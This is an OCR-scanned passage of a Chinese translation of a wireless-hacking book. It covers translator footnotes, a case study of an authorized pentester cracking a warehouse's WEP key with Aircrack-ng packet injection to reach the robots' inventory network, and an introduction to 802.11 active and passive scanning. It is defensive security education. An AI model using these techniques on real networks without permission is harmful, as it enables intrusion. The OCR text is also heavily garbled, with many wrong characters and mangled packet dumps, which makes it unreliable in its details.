[1] Gary Kildqall 是 微型 计算 机 早期 操作 系统 DOS 设 计 者 之 一 。 译 者 注 


2] 黑 帽 子 组 织 ， 发 起 于 美国 的 一 个 国际 黑客 组 织 ， 主 要 以 “ 黑 帽 简报 ”的 形式 在 全 世界 各 地 举办 技术 性 很 强 的 信息 安全 会 议 。 


译 者 注 
D3] ” 蓝 帆 子 组 织 ， 名 称 仿 于 黑 帽 子 组 织 ， 由 Microsoft 创 建 ，“ 蓝 由 ”会 议 每 年 举办 两 次 ， 旨 在 通过 与 黑客 之 间 的 交流 提升 自己 产 


品 的 安全 性 。 


译 者 注 


[4] Toorcon， 发 起 于 美国 加 州 圣 迭 区 市 的 一 个 相对 较 新 的 年 度 计 算 机 黑客 安全 会 议 。 译 者 注 

[5] 计算 机 程序 中 很 多 与 序列 相关 的 表示 都 是 从 0 开始 算 起 ， 比 如 表示 5 个 事物 ， 则 程序 中 的 序号 通常 用 0~4 来 表示 ， 而 不 是 1~5。 
译 者 注 

[6] 安永 会 计 师 事务 所 ， 国 际 四 大 会 计 师 事务 所 之 一 ， 全 美 第 二 大 会 计 师 事 务 所 。 
[7] 本 书 中 文 版 已 由 机 械 工业 出 版 社 出 版 ，ISBN: 978-7-111-35662-2. 


译 者 注 


编辑 注 
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第 一 部 分 ”破解 802.11 无 线 技术 


案例 学 习 : 为 工作 而 战 的 无 线 破解 
她 的 第 一 次 无 线 评估 工作 


Makoto 过 去 一 直 心 安 理 得 地 做 着 一 份 基础 设施 评估 的 工作 ， 不 过 这 是 她 第 一 次 被 要 求 为 一 个 客户 完成 其 无 线 评 估 的 工作 ， 为 
此 她 已 经 从 邻居 家 “人 和 借 到 ”了 一 人 台 Wi-Fi 设 备 ， 以 及 旅行 中 不 会 令 人 产生 怀疑 的 东西 。 她 知道 所 选 时 机 不 能 再 粮 了 ， 那 时 正 值 隆 
冬 时 节 ， 她 设想 要 访问 的 站 点 应 该 是 一 个 很 远 的 ， 并 且 传 说 中 因为 雪 暴 而 闻名 的 地 方 。 虽 然 当 她 到 达 那 里 时 ， 还 不 算是 桃色 天 气 

(美国 一 种 表示 雪 天 积 雪 厚度 的 说 法 ， 桃 色 表 示 积 雪 厚 度 大 约 在 2.5~5 米 译 者 注 ) ,但 她 还 是 预先 做 足 了 功课 ， 以 便 找到 一 


种 最 好 的 方式 以 避免 困 于 大 雪 中 。 同 时 她 还 计划 了 需要 提前 准备 的 所 有 设备 ， 并 且 打 包 了 各 种 无 线 仪器 。 她 觉得 她 可 能 需要 的 设 
备 有 : 一 组 无 线 网 卡 ， 远 距离 的 定向 天 线 和 一 个 带 有 基于 Athetos 无 线 网 卡 的 笔记 本 电脑 。 还 带 了 一 个 GPS 装置 以 备 这 路 时 使 用 ， 
一 个 车 载 点 烟 器 插座 的 电源 适配器 可 以 使 笔记 本 在 处 于 “战争 驾驶 ”| 1 (wat driving) 的 时 候 提供 电力 。 所 有 这 些 设备 在 她 通 

机 场 安检 的 时 候 ， 虽 然 给 她 带 来 了 机 场 安 检 员 无 数 怀疑 的 眼光 ,但 她 最 终 没 有 遇 到 多 少 麻 烦 地 通过 了 安检 。 


当 她 在 评估 前 的 晚上 抵达 旅馆 后 ， 她 向 旅馆 前 台 询 问 次 日 上 午 到 达 目 的 地 需要 多 少时 间 ， 因 为 她 以 前 从 未 到 过 这 个 地 方 ， 也 
不 知道 是 否 有 什么 交通 工具 ， 所 以 最 好 提前 问 清 特别 是 现在 正 值 寒冬 ， 有 些 路 有 可 能 会 被 封 掉 。 


靠近 停车 库 进行 检测 


像 往 常 一 样 ，Makoto 抵 达 站 点 时 有 点 儿 早 。 当 她 到 达 那 里 后 ， 她 意识 到 这 是 一 个 庞大 的 航运 和 接收 设施 的 大 型 仓库 ， 卡 车 进 
进出 出 ， 络 绎 不 绝 。 然 而 ， 卡 车 两 边 的 入 口 处 标 有 不 同 的 名 称 ， 因 此 她 得 出 结论 : 最 有 可 能 的 是 多 个 企业 共用 这 个 站 点 。 她 做 好 

了 心理 准备 ， 此 时 她 不 得 不 做 出 肯定 的 结论 ， 即 好 计划 中 访问 的 所 有 无 线 网 络 实际 上 都 属于 这 个 客户 ， 而 不 属于 相 邻 企业 中 的 任 
何 一 个 。 


在 进入 仓库 之 前 ， 她 决定 先 看 看 从 仓库 外 部 可 以 检测 到 什么 。 她 把 车 停 在 了 工厂 的 车 库 ， 打 开 她 的 笔记 本 电脑 ， 首 先 使 用 内 
置 在 Windows 中 的 无 线 工具 对 无 线 网 络 进 行 了 第 一 轮 搜索 。 她 知道 主动 扫描 是 非常 有 限 的 方式 任何 具备 无 线 评 估 知 识 的 人 都 知 
道 将 无 线 网 卡 设 置 为 监控 模式 。 不 过 ， 她 也 觉得 主动 扫描 这 种 典型 的 方式 ， 对 于 大 街 上 随便 哪个 人 ， 用 来 试 试看 都 有 哪些 无 线 网 

络 是 开 着 的 ， 也 不 失 为 一 种 方法 。 这 样 也 许 能 获得 些 有 用 的 信息 。 很 快 ， 她 捕捉 到 了 一 些 采 用 出 厂 默认 配置 和 一 些 使 用 WEP 和 
WPA 的 组 合算 法 进行 加 窗 的 无 线 网 络 名 称 。 但 她 不 确定 这 些 站 点 是 属于 她 要 找 的 客户 的 ， 还 是 别 的 企业 的 ， 所 以 她 只 是 简单 地 
记录 了 她 能 看 到 的 内 容 ， 然 后 就 继续 往 前 走 了 。 


接着 ， 她 进行 更 彻底 的 外 部 测试 。Makoto 插 入 外 置 的 基于 Athetos 的 无 线 网 卡 ， 连 接 上 一 个 高 增益 的 定向 天 线 ， 然 后 开机 引 
导 一 个 预先 准备 好 的 BackTrack Linux 的 USB 客 钥 盘 ， 随 后 将 无 线 网 卡 设置 为 监控 模式 。 运 行 aitrodump-ng (Aitcrack-ng 工 具 套件 的 一 
部 分 译 者 注 ) ， 并 将 天 线 调整 为 对 准 该 客户 端 所 拥有 的 设施 的 一 部 分 。 由 于 定向 天 线 具 有 定向 作用 ， 之 前 检测 出 来 的 那些 
无 线 网 络 由 于 现在 不 在 所 指 方向 的 范围 内 ， 因 此 都 没有 显示 出 来 。 然 而 ， 新 的 无 线 网 络 出 现 了 ， 此 时 该 新 网 络 正 处 于 隐藏 SSID 
状态 ， 并 且 用 WEP 算 法 进行 了 保护 。 随 着 时 间 的 增长 ， 她 看 到 软件 收 到 的 数据 包 个 数 也 在 逐步 上 上升。 但 是， 现在 还 不 能 确定 这 
个 无 线 网 络 是 否 属于 要 找 的 客户 端 ， 于 是 她 决定 现在 只 是 先 记录 。 当 她 将 天 线 一 直 指 向 一 个 建筑 物 的 时 候 ， 有 人 向 这 边 走 来 ， 从 
Makoto 车 旁边 的 一 个 车 里 拿 出 个 什么 东西 。 此 时 ，Makoto 本 可 以 先入 为 主 地 反咬 一 口 ， 上 前 质问 那个 人 偷偷 摸 摸 地 想 干 什么 
而 掩饰 自己 ， 假 装 自己 根本 不 是 那个 被 检查 出 在 车 上 用 笔记 本 电脑 并 将 天 线 对 着 大 厦 的 人 。 但 随后 ，Makoto 会 心地 笑 了 笑 ， 她 很 
欣慰 于 自己 不 必 如 此 紧张 ， 因 为 如 果 那 个 人 向 她 发 出 安全 警告 ， 甚 至 直接 打 电 话 报警 ， 那 么 Makoto 就 拿 出 她 的 站 点 联系 信息 给 关 


方 看 ， 以 消除 误会 。 


她 现在 党 得 已 完成 了 足够 的 户外 侦察 ， 到 了 直接 联系 站 点 的 时 候 了 。 她 首先 接触 的 是 站 点 经 理 ， 虽 然 站 点 经 理应 该 是 对 这 个 
站 点 最 熟悉 的 人 了 ，, 但 是 现在 他 已 离开 了 那个 继续 支持 这 个 项 目的 信息 安全 团队 。 站 点 经 理 说 他 知道 Makoto 要 来 这 儿 ， 因 为 早 些 
时 候 就 有 人 到 他 那里 ， 说 有 一 个 看 上 去 很 可 疑 的 人 带 着 一 台 笔 记 本 电脑 和 天 线 在 停车 库 不 知道 在 做 什么 ， 并 且 站 点 经 理 很 高 兴 听 


到 员工 的 提醒 。 


入 侵 机 器 人 系统 


首先 ， 她 以 一 个 陪同 者 的 身份 和 站 点 经 理 一 起 全 面 地 查勘 了 设施 。 她 带 上 她 的 小 上 网 笔记 本 电脑 ， 在 这 个 上 网 本 上 ， 一 个 基 
于 Atheros 的 迷你 PCI 无 线 卡 已 设置 为 监控 模式 ， 以 便 可 以 寻找 任何 无 线 接 入 点 (Access Point，AP) 。 由 于 这 些 零 星 散 布 于 总 部 
办 公 室 周围 的 卫星 办 公 室 远离 企业 总 部 位 置 ， 因 此 无 线 接 入 点 的 位 置 就 成 了 信息 安全 项 目 提供 商 所 关心 的 事情 之 一 。 而 Mokoto 
所 参与 活动 的 一 部 分 就 是 分 类 汇总 这 些 接 入 点 的 位 置 布 局 ， 然 后 看 是 否 有 任何 未 经 授权 的 无 线 接 入 点 (恶意 AP) 已 被 偷偷 地 安 


装 在 某 处 。 站 点 经 理 告诉 Mokoto 说 ， 他 们 这 里 没有 无 线 网 络 ， 他 们 这 个 站 点 是 唯一 一 个 使 用 最 少 的 I 开 基础 设施 的 航运 和 接收 站 
(或 者 这 只 是 他 认为 的 ) 。 


陪 着 站 点 经 理 在 这 个 大 型 航运 和 接收 站 内 走 了 一 圈 。 这 是 一 个 名 符 其 实 的 汇集 地 ， 自 动机 器 人 将 周边 货物 在 平台 间 移 动 ， 同 
时 有 人 驾驶 小 型 又 车 ， 装 纯 货物 到 停泊 在 服务 舱 的 卡车 上 。 除 了 一 间 小 办 公 室 紧 靠 仓库 外 ， 站 点 经 理 的 办 公 点 就 在 这 个 小 办 公 室 
偏 右边 的 位 置 上 ， 好 像 小 办 公 室 里 几乎 没有 什么 IT 基 础 设施 。 当 Mokoto 走 完了 一 圈 后 ， 她 通过 她 那个 高 增益 天 线 仍然 看 到 
有 “隐藏 的 无 线 信号 从 外 边 进入 到 这 里 。 由 于 信号 特别 强 ， 因 此 即使 是 使 用 她 笔记 本 内 置 的 天 线 ， 也 足以 让 她 敢 肯 定 地 说 ， 这 

号 来 自 于 仓库 内 的 某 个 地 方 。 事 实 上 ， 当 她 使 用 Kismet 软 件 走 了 一 圈 的 时 候 ， 她 注意 到 信号 发 生 了 强度 波动 ， 并 且 在 大 型 厂 
房 区 域内 比 在 办 公 室 内 的 信号 更 强 ， 对 比 了 位 置 ， 她 认为 这 个 “隐藏 的 ”无 线路 由 器 已 经 基本 被 定位 。 


当 她 在 周围 走 的 时 候 ， 她 关注 到 了 那些 正在 移动 平台 的 机 器 人 人。 这些 机 器 人 似乎 从 来 没有 相互 碰 到 过 对 方 ， 因 此 她 推断 它们 
被 什么 东西 所 控制 。 她 还 注意 到 ， 每 一 次 机 器 人 拾 起 和 放下 货物 的 平台 ， 他 们 都 会 扫描 平台 和 设备 一 侧 的 一 个 大 的 条 形 码 ， 
发 出 “ 咬 咬 ”的 声音 。 每 当 一 个 又 车 司机 托 起 平台 并 将 它 搬 进 一 个 等 待 的 卡车 上 时 ， 同 样 的 事情 也 会 发 生 ， 他 们 将 用 手持 设备 打 
描 平台 。 机 器 人 和 条 形 码 扫描 器 之 间 能 通过 某 种 类 型 的 无 线 网 络 进行 通信 吗 ? 可 能 是 她 之 前 看 到 的 用 WEP 算 法 保护 的 无 线 信号 
吗 ? 


进一步 环顾 四 周 ， 她 发 现 有 一 个 大 箱子 附着 在 仓库 的 橡 梁 上 。 有 些 管道 线 楼 似乎 是 从 它 这 里 出 去 的 ， 所 以 她 想 这 也 许 是 无 线 
言 号 的 源头 。 架 起 她 的 高 增益 无 线 网 卡 和 定向 天 线 ， 指 向 大 箱子 所 在 的 房子 及 周围 ， 她 发 现 当 定向 天 线 直 对 盒子 的 时 候 ， 信 号 跳 
变 得 相当 剧烈 (或 者 说 : 当 定 向 天 线 对 着 房子 周围 的 时 候 ， 由 于 从 盒子 中 发 出 的 信号 被 分 散 ， 因 此 天 线 不 能 更 多 地 接收 到 信号 
信号 就 显得 不 那么 强 ) 。 她 已 可 以 确定 : 信号 就 是 从 大 箱子 那里 发 出 来 的 。 


隐藏 的 AP 就 是 这 个 客户 的 ， 而 不 是 隔壁 公司 的 。 有 了 较 大 的 信心 之 后 ， 她 决定 是 时 候 来 决定 一 下 能 做 点 什么 了 。 根 据 客户 
的 指示 就 是 尝试 一 下 渗透 到 她 之 前 所 发 现 的 随便 哪 一 个 无 线 基础 设施 中 ， 然 后 看 看 进入 网 络 后 她 还 可 以 做 什么 。 使 用 上 述 的 
Aircrack-ng 工 具 包 ，Mokoto 将 她 的 无 线 网 卡 设置 为 监视 模式 ， 然 后 对 这 个 隐藏 的 AP 接 入 点 执行 一 个 假 身份 验证 ， 并 开始 执行 数据 
包 注 入 式 攻 击 。 


她 注意 到 ， 每 当 一 个 机 器 人 或 叉车 司机 要 描 一 个 平台 ， 该 无 线 网 络 的 数据 包 计 数 器 就 会 递增 。 她 认为 这 些 机 器 人 和 手持 扫描 
器 肯定 是 使 用 无 线 网 络 进行 沟通 和 跟踪 库存 。 这 给 了 她 足够 的 有 用 数据 ， 将 这 些 有 用 数据 回放 到 路 由 器 ， 就 可 以 通过 ARP 注 入 式 
攻击 来 生成 更 多 的 初始 化 向 量 (IV) 。 


只 用 了 大 约 10 分 钟 ，Mokoto 就 破解 了 这 个 WEP 密 钥 。 这 足以 证 明 WEP 所 提供 的 保护 是 如 此 单薄 。Mokoto 使 用 这 个 密 钥 ， 用 
自己 的 电脑 与 AP 相 关联 后 ， 她 获得 了 一 个 通过 动态 主机 配置 协议 (Dynamic Host Configuration Protocol，DHCP) 所 分 配 的 IP 地 
址 。 现 在 ， 她 已 登录 到 了 机 器 人 和 条 码 扫 描 器 所 使 用 的 网 络 上 。 但 她 可 以 做 什么 呢 ? 如 果 在 这 个 航运 站 的 机 器 人 每 扫描 一 个 平台 
上 的 某 种 类 型 的 条 形 码 ， 也 许 信 息 就 会 被 跟踪 保存 到 某 处 ， 也 许 这 些 机 器 人 与 一 个 后 端 服务 器 进行 数据 交互 。 于 是 Mokoto 编 写 
了 一 个 小 的 脚本 程序 来 ping 该 子 网 中 的 每 一 个 IP 地 址 ， 一 些 ping 的 回复 和 几 个 端口 扫描 之 后 ， 她 意识 到 所 有 的 自动 化 机 器 都 不 约 
而 同 地 与 同一 网 段 的 某 个 库存 服务 器 进行 通信 ! 她 党 得 试图 渗透 到 该 库存 服务 器 的 操作 超出 了 她 所 接 的 这 个 项 目的 职责 范围 ， 所 
以 Mokoto 只 做 了 一 张 当 前 她 所 能 达到 的 这 一 步 的 一 个 截图 ， 这 足以 证 明 她 可 以 从 这 个 无 线 接 入 点 渗透 进入 该 网 络 中 。 更 重要 的 
是 ， 她 只 是 通过 一 些 简 单 的 网 络 发 现 站 (netwotk discovery) 操作 ， 就 能 看 出 她 可 以 访问 该 企业 内 的 内 部 域 控 制 器 ， 甚 至 访问 位 
于 世界 不 同 地 区 的 服务 器 ! 


最 后 的 总 结 


在 连接 并 进入 无 线 基 础 设 内 部 后 ，Mokoto 再 次 对 站 点 经 理解 释 说 ， 机 器 人 和 条 码 扫 描 器 通过 无 线 连 接 方式 连接 到 后 端 库存 
系统 ， 并 且 她 能 够 在 破解 WEP 禾 钥 之 后 与 接 入 点 建立 关联 。 站 点 经 理 听 到 这 些 后 ， 对 Makoto 解 释 道 ， 她 所 破解 的 库存 系统 大 约 


安装 于 5 年 前 ， 该 系统 所 用 的 加 窗 方 法 是 较 早 设计 的 算法 ， 对 于 该 无 线 设 备 采 用 802.11 标 准 进 行 通 信 等 方面 的 专业 知识 他 也 不 了 
解 。 对 于 他 和 和 办公室 中 使 用 计算 机 的 其 他 人 来 说 ， 他 们 从 来 没 认 为 那个 地 方 看 上 去 像 是 个 无 线 基 础 设施 。 更 糟糕 的 是 ， 虽 然 
Makoto 入 侵 了 该 无 线 系统 ， 但 她 是 在 客户 的 办 公 室 中 ， 是 在 客户 知道 的 前 提 下 做 的 ， 没 有 理由 说 她 不 能 坐 在 街 对 面 用 一 个 高 功率 
天 线 指向 大 厦 ， 在 客户 毫 不 知情 的 前 提 下 这 么 做 呀 。 那 么 之 前 有 没有 人 这 样 做 ? 之 后 会 不 会 有 人 这 样 做 ? 没有 人 会 知道 。 


[1] 战争 驾驶 ， 指 通过 驾驶 车 辆 ， 在 目标 区 域 往返 等 行为 来 进行 Wi-Fi 无 线 接 入 点 探测 ， 可 在 车 辆 内 部 使 用 诸如 PDA、 笔 记 本 电脑 
等 设备 。 根 据 驾 驶 的 工具 不 同 ， 类 似 的 还 有 “战争 单车 ” (war ”biking， 通 过 自行 车 、 电 动车 、 摩 托 车 ) 、“ 战 争 徒步 ” (war 
walking， 通 过 步行 ) 、 “战争 飞行 (war flying， 通 过 飞机 ) 。 译 者 注 

D] ”网 络 发 现 属于 服务 发 现 的 一 个 分 支 ， 该 技术 本 身 并 不 简单 ， 但 该 技术 是 现代 操作 系统 中 的 标准 配置 ， 而 不 是 黑客 专用 的 程 
序 。 任 何 普 通 人 都 可 以 实施 该 操作 ， 可 见 其 攻击 极 具 普 及 性 和 普遍 性 ， 所 以 称 为 “简单 的 ”网 络 发 现 。 译 者 注 


第 1 草 ”802.11 协 议 的 攻击 介绍 


欢迎 阅读 本 书 。 第 1 章 主要 介绍 802.11 协 议 ， 以 帮助 读者 在 工作 中 选择 正确 的 802.11 设 备 ， 使 读者 基本 了 解 802.11 协 议 ， 同 
时 增加 一 些 常识 ， 包 括 如 何 购买 无 线 网 卡 、GPS、 天 线 等 设备 。 读 者 也 可 以 理解 无 线 服务 友 现 工具 (如 Kismet) 是 如 何 工作 
的 。 


1.1 802.11 标 准 徊 介 


802.11 标 准 定义 了 一 个 数据 链 路 层 的 无 线 协 议 ， 该 标准 由 美国 电气 和 电子 工程 师 协 会 (Institute of Electrical and 
Electronics Engineers，IEEE) 负责 管理 。 许 多 人 在 听 到 802.11 时 会 想到 Wi-Fi 技 术 ， 然 而 二 者 并 不 是 等 同 的 事物 。Wi-Fi 标 准 
是 802.11 标 准 的 一 个 子 集 ， 并 且 是 由 Wi-Fi 联 盟 负责 管理 。 因 为 802.11 标 准 过 于 复杂 ， 其 标准 的 更 新 流程 非常 耗费 时 间 (更 新 操 
作 由 IEEE 下 的 一 个 委员 会 负责 ) ， 所 以 几乎 所 有 的 主流 无 线 设 备 制 造 商 都 觉得 他 们 需要 一 个 小 但 灵活 的 组 织 ， 当 他 们 通过 市 场 努 
力 推 进 技术 进步 时 ， 该 组 织 能 在 供应 商 之 间 进 行 协调 工作 。 这 导致 了 Wi-Fi 联 盟 的 成 立 。 

Wi-Fi 联 盟 确 保 所 有 具有 Wi-Fi 认 证 标志 的 产品 能 够 在 一 组 限定 功能 的 基础 上 一 起 工作 。 这 样 如 果 802.11 协 议 中 突然 出 现任 
何 具有 两 义 性 的 概念 时 ，Wi-Fi 联 盟 会 定义 一 个 作为 “正确 的 项 ”， 然 后 按照 “正确 的 项 ”去 做 。 该 联盟 还 允许 供应 商 实现 一 
些 草案 标准 ( 指 未 经 过 批准 的 标准 [1) 的 重要 子 集 。 在 草案 标准 中 ， 最 著名 的 例子 就 是 Wi-Fi 保 护 访问 (Wi-Fi Protected 


Access，WPA) 或 叫做 “草案 标准 ”802.11n。 


提示 “对 大 量 详细 的 、 围 绕 802.11 标 准 的 详细 介绍 ， 可 参见 本 书 的 配套 网 站 中 的 Bonus Chapter 1， 网 址 是 


http:/ /www.hackingexposedwiteless.com。 


[11] ”802.11n 标 准 在 2009 年 获得 IEEE 的 正式 批准 ， 而 Wi-Fi 联 盟 在 2007 年 就 发 布 了 《802.11n 技 术 白 皮 书 》， 所 以 Wi-Fi 的 很 多 早 于 


IEEE 的 标准 ， 在 当前 只 能 称 为 “草案 。 译 者 注 


1.2 ” 网络“ 服务 友 现 ”的 基本 知识 


在 攻击 一 个 无 线 网 络 之 前 ， 需 要 找到 一 个 无 线 网 络 。 多 个 不 同 的 工具 可 以 完成 这 一 功能 ,但 它们 都 归于 以 下 两 大 类 : 被 动 式 


或 主动 式 。 说 动 式 工 具 用 于 监视 给 定 信道 上 数据 包 的 无 线 信 和 号。 它们 通过 分 析 数 据 包 来 确定 哪些 客户 端正 与 接 入 点 进行 会 话 。 主 
动 式 工具 的 原理 很 基础 ， 它 们 发 送 探 测 请 求 数据 包 ， 希 望 得 到 回应 。 在 攻击 任何 无 线 网 络 之 前 ， 了 解 和 选择 工具 都 是 一 个 重要 的 
步骤 。 随 看 对 “战争 加 驶 ”的 一 些 参与 实践 ， 本 节 肖 兰 了 网 络 及 现 所 需 的 软 、 硬 件 的 基本 原则 。 第 2 章 将 深入 研究 现今 可 使 用 的 
主要 工具 。 妈 现 无 线 网络 ， 特 移 应 该 了 解 主动 和 被 动 扫 摘 的 基础 知识 。 


会 ”主动 扫描 


iU 


国 


0 


执行 主动 扫 拉 的 工具 定期 友 送 探测 请 求 数据 包 。 每 当 客 尸 亲 需 要 寻找 网 络 的 时 候 ， 客 尸 端 束 会 使 用 这 些 数据 包 。 客 尸 端 可 能 
友 送 有 针对 性 的 探测 请 求 (“网 络 X， 你 在 那 边 吗 ? ”) ， 如 图 1-3 所 示 。 或 者 它们 也 可 以 通过 广播 的 方式 友 送 探测 请 求 数据 包 
(“ 喂 ， 有 人 吗 ?”) ， 如 图 1-4 所 示 。 探 测 请 求 是 802.11 标 准 规范 的 两 项 技术 之 一 ， 该 规 汽 用 于 客 尸 端 寻 找 网 络 并 进行 天 联 。 
客户 端 还 可 以 使 用 信 标 寻找 网 络 。 


AP 每 1/10 秒 友 出 信 标 数据 包 。 每 个 数据 包 包 含 相同 的 信息 集合 ， 这 些 信息 集合 将 出 现在 探测 回复 数据 包 中 ， 包 括 姓 名 、 地 
址 、 所 文 持 的 速率 等 。 看 起 来 这 些 数据 包 似乎 很 容易 被 任何 的 接收 者 监听 到 ， 所 以 大 多 数 主动 扫 摘 器 都 能 够 对 它们 进行 处 理 ; 然 
而 ， 并 非 总 是 如 此 。 在 某 些 情况 下 ， 主 动 扫 摘 器 虽然 可 以 访问 信和 标 数 据 包 ， 但 却 并 不 忠 是 这 样 。 详 情 取决 于 所 使 用 的 扫 拉 器 和 控 
制 无 线 网 卡 的 驱动 程序 。 主 动 扫 拍 器 的 主要 摧 点 是 程序 界面 上 除了 能 看 到 探测 请 求 (和 可 能 的 信和 标 ) 的 数据 包 之 外 ， 看 不 到 其 他 
任何 无 线 通 信 内 容 。 


) w directed=probe=req.pcap = Ethereal 
File Edit Yiew Go teapture Anahyze Statisties Help 


= 二 | 十 Expression,,. ag Slear apphy 


| 10000000 D-Link 5fa2:48 Broadcast Ny 


2 0.000755 Netgear_eb:dc:c0 D-Link_ Sf:a2:48 IEEE 8 Probe Response, SSID:; NETGEAR- 


b Frame 1 (49 bytes on Wire, 49 bytes captured) 
> IEEE 802.11 
Type/Subtype: Probe Regquest (4) 
bb Frame Control: Ox0040 (Normal) 
Duration: 0 
Destination address: Broadcast (Tf:-ff:ff:ff:ff: 作 ) 
Source address: D-Link_ Sf:a2:48 (00:13:46:5f:a2.48) 
BSS Id: Broadcast (ff:ff:ff:ff:ff: 作 ) 
Fragment number: 0 
Seguence number: 859 
= IEEE 802.11 wireless LAN management frame 
Y lagged pararmeters (22 bytes) 
by SSID parametrer set: "NETGEAR" 
b Supportred Rates: 1.0205511.06.012.024.0 36.0 
上 Extended Suppored Rates. 9.0 18.0 48.0 34.0 


OOO00 40 00 O00 O00 ffffffi fffi0O0 L340 31 a2 48 ®,..........F_.H 

O010 fffffffiff bo 35 O00 O07 4e 4554 47 45 41 .......5 ..NETGEA 

0020 52 01 08 02 04 Ob 16 Oc 18 30 48 32 .04 122460 R....... .DH2.. 抽 
0030 6c | 


File: "JUsersfjoh.. :|P: 2D:2M:0 


图 1-3 一 个 直接 的 探测 请 求 数据 包 (注意 其 中 的 SSID 参 数 是 个 广播 地 址 ) 


大 多 数 操作 系统 都 是 在 寻找 要 连接 的 网 络 时 才 采 用 主动 扫 摘 。 它 们 通 划 定期 地 这 样 做 ， 同 时 也 啊 应 用 户 的 更 新 请 求 数据 包 . 
这 些 操作 系统 所 不 同 的 是 它们 是 否 发 送 定向 探测 请 求 数据 包 。 在 Windows XP SP2 操 作 系统 出 现 之 前 ， 客 户 端 通常 为 所 有 它们 想 
连接 的 主机 的 SSID 友 送 定 向 探测 数据 包 ， 所 有 AP 通 常会 包含 保存 在 用 尸 的 网 络 偏爱 列表 (user s preferred network list) 
中 。 后 来 ， 操 作 系统 开 友 商 改进 了 扫描 技术 ， 只 在 必要 的 时 候 友 送 定 同 探测 数据 。 


和 
会 比 你 所 用 操作 系统 的 能 力 更 强 ， 你 只 能 找到 那些 出 现在 你 操作 系统 的 可 用 网 络 名 单 里 的 网 络 ) ， 与 被 动 扫 手工 具 相 比 ， 这 一 点 
使 得 它们 被 排挤 到 一 个 非常 不 利 的 地 位 .。 


| 
Fr : 
Se NW broad-probe-req.pcap - Ethereal 
File. Edit Wilew G6 Capture Analyze Statlsties Help 


若 汕 好 全 名 广 因 x 名 与 则 4 外 加 TF 了 有 旧 和 QQQD 访 | 
BDA) enter =| 守 Expression.., 


oo. [rime se [ownern ome | 
| 1 0:000000 D-Link e3:b4:2c Broadcast IEEE 8 Probe Regqyest, SSID: Broadcast | 
2 0.000712 Cisco-L 3a:6c:erf D-Link_e3:b4:2c IEEE 8 Probe Response, SSID: "Beleriand" 
3 D0.000805 Cilsco-Li_3a.:6c.ef (RA IEEE 8 Acknowledgement 
4 0.002108 Netgear_5d.92:6e D-Link_e3.:b4:2c IEEE 8 Probe Response, SSID; dojooffoo 
5 0.003722 Netgear _ Sd.92:6e D-Link_e3:b4:2c IEEE 8 Probe Response, SSID: "dojooffoo" 


I Frame 1 (42 bytes on Wire, 42 bytes captured) 
| IEEE 802.11 
Type/Subtype: Probe Regquest (4) 
Frame Control: Ox0040 (Normal) 
Duration: 0 
Destination address: Broadcast (ff:ff:ff:ff:ff-ff) 
source address: D-Link_e3:bd:2c (00:13:46.e3:b4:2c) 
BSS Id Broadcast (ff:ff:ff:ff:ff: 人 ff) 
Fragment number: 0 
Sequence number: 1972 
b IEEE 802.11 Wireless LAN management frame 


] O000 40 900 O00 O00 fffffff ffff O00 1346 ee3b4 2c 加 FE; 
O010 fifi 40 7b O00 O00 O01 O08 82 84 8b 96 
D020 Oc 12 18 24 32 04 30 48 60 8c 


| | File: ",/broad-pr.. 3 


图 1-4 一 个 典型 的 广播 探测 请 求 数据 包 
噢 探 器 、 搜 寻 器 、 扫 搬 器 ， 这 都 是 什么 呀 


与 无 线 工 具 相关 的 术语 呈现 出 “一 边 倒 ”的 状况 。 一 般 来 说 ， 绝 大 多 数 主 动 扫描 工具 被 称 为 搜寻 器 (stumbletr) ， 反 之 ， 绝 
大 多 数 被 动 扫 描 工 具 (用 这 一 术语 的 更 多 ) 称 为 扫 摘 器 (scanner) 。 然 而 ， 搜 寻 器 通常 被 认为 是 一 个 “扫描 工具 ”〈 即 使 从 技术 
上 看 ， 不 能 算是 扫描 器 ) 。 嘿 探 器 (snifferf) 是 网 络 监控 工具 ， 并 且 与 无 线 网 络 也 没有 必然 的 相关 性 。 它 是 一 个 简单 的 工具 ， 可 
以 显示 网 卡 接口 所 能 看 到 的 所 有 数据 包 ; 它 也 是 一 个 应 用 程序 。 如 果 一 个 无 线 驱动 程序 或 网 卡 不 给 噢 探 器 数据 包 进 行 处 理 ， 那 它 
就 什么 也 不 能 做 。 


NI/ 


四 ”被 动 扫描 (监控 模式 ) 


5 


I 
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执行 书 动 扫 摘 的 工具 产生 的 效果 要 比 使 用 主动 扫 摘 的 工具 好 很 多 。 补 动 扫 摘 工具 目 身 不 友 送 数据 包 ; 相反 ， 它 们 监听 给 定 信 
道上 的 所 有 数据 包 ， 然 后 分 析 这 些 数 据 包 ， 看 看 会 发 生 什 么 。 这 些 工 具 能 更 好 地 查看 周围 网 络 。 然 而 ， 为 了 做 到 这 一 点 ， 所 用 的 
无 线 网 卡 需要 支持 一 种 称 为 监控 模式 (monitor mode) 的 功能 。 


把 一 个 无 线 网 卡 设置 为 监控 模式 类 似 于 把 一 个 正常 的 有 线 以 太 网 卡 设置 为 渴 杂 模式 (promiscuous mode) 。 在 这 两 种 情 
况 下 ， 可 以 看 到 所 有 走 过 “ 线 绕 ” (或 信道 ) 的 数据 包 。 然 而 ,一 个 关键 区 别 是 : 当 你 把 有 线 网 卡 设置 为 混杂 模式 时 ， 肯 定 只 能 
看 到 你 所 接 入 的 网 络 上 的 所 有 通信 。 在 无 线 网 卡 上 就 不 是 这 种 情况 了 。 因 为 2.4GHz 范 围 的 波段 频率 是 非 授 权 的 1]， 它 是 可 以 共 
享 访问 的 ， 这 意味 着 使 用 同一 信道 可 以 有 多 个 重 又 网络。 如 果 你 和 你 的 邻居 共享 同一 信道 ， 当 把 你 的 网 卡 设置 为 监控 模式 想 看 看 
你 的 网 络 中 会 发 生 什么 时 ， 你 也 会 看 到 她 的 通信 数据 包 ，。 


无 线 网 卡 和 有线 网 卡 的 另 一 个 关键 区 别 是 : 以 太 网 卡 上 的 混杂 模式 是 一 个 标准 功能 。 某 一 具体 的 无 线 网 卡 上 的 监控 模式 ， 则 
不 能 简单 地 假设 肯定 有 。 对 于 一 个 给 定 的 支持 监控 模式 的 网 卡 ， 必 定 会 出 现 两 种 情况 。 第 一 ， 网 卡 本 身 的 心 片 必须 支持 这 种 模式 
(更 多 关于 此 的 说 明 ， 请 见 1.3.2 书 ) ， 第 二 ， 正 在 使 用 的 驱动 程序 也 必须 同样 支持 监 探 模式。 显然， 选择 一 个 支持 监控 模式 的 

让 卡 (也 许 是 在 多 个 操作 系统 上 都 支持 ) 对 于 想 成 为 无 线 黑 客 的 用 户 来 说 是 重要 的 第 一 步 。 


